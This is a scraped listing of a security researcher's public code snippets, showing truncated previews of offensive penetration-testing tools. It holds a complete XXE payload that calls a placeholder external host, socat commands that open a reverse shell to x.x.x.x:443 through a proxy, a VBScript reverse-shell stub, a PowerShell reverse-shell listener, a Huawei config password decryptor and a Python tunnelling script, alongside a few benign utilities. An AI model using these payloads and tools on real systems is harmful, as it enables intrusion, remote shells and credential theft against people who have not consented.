Skip to content

Instantly share code, notes, and snippets.

@staaldraad
staaldraad / XXE_payloads
Last active May 24, 2024 11:08
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@staaldraad
staaldraad / webdavserv.go
Last active May 23, 2024 15:14
A small webdav server in go
package main
import (
"flag"
"fmt"
"log"
"net/http"
"os"
"golang.org/x/net/webdav"
@staaldraad
staaldraad / huaweiDecrypt.py
Created March 11, 2015 13:19
Decrypt Huawei router/firewall passwords. Huawei stores passwords using DES encryption when the crypted option is enabled.
#!/usr/bin/python
"""
Simple tool to extract local users and passwords from most Huawei routers/firewalls config files.
Will extract plain-text passwords and crypted credentials. Huawei config files use DES encryption with
a known key. Using this information, the script will decrypt credentials found in the config file.
Author: Etienne Stalmans (etienne@sensepost.com)
Version: 1.0 (12/01/2014)
"""
from Crypto.Cipher import DES
@staaldraad
staaldraad / Command.vbs
Last active May 13, 2024 09:04
Using VBSMeter with Ruler
Call X()
End Function
Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"
Function Base64ToStream(b)
Dim enc, length, ba, transform, ms
Set enc = CreateObject("System.Text.ASCIIEncoding")
length = enc.GetByteCount_2(b)
@staaldraad
staaldraad / awk_netstat.sh
Last active May 9, 2024 01:14
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
@staaldraad
staaldraad / oauthServer.go
Last active March 2, 2024 16:56
A mini OAuth server for Azure
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
)
@staaldraad
staaldraad / pyforw.py
Last active February 19, 2024 06:54
Python script to create a Connect-Connect tunnel. For those times ncat/socat can't be put on the box and python is available..
#!/usr/bin/python
"""
Python script to create a Connect-Connect tunnel. For those times ncat/socat can't be put on the box and python is available..
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 1.0 (22_01_2015)
Usage: python pyforw.py <targetIP> <targetPort> <jumpbox> <jumpboxPort>
python pyforw.py 10.1.1.1 3389 179.0.0.100 8081
"""
from socket import *
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at 10.10.10.1:8222:
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"

Based on excellent write-up from https://www.elttam.com.au/blog/ruby-deserialization/

Doesn't work to use YAML.dump(payload) in the above script. This only produces the following YAML, which is worthless:

--- !ruby/object:Gem::Requirement
requirements:
- - ">="
  - !ruby/object:Gem::Version
 version: '0'
@staaldraad
staaldraad / mini-reverse-listener.ps1
Created October 3, 2016 14:49
A reverse shell listener in powershell
$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413);
if($socket -eq $null){
exit 1
}
$socket.start()
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"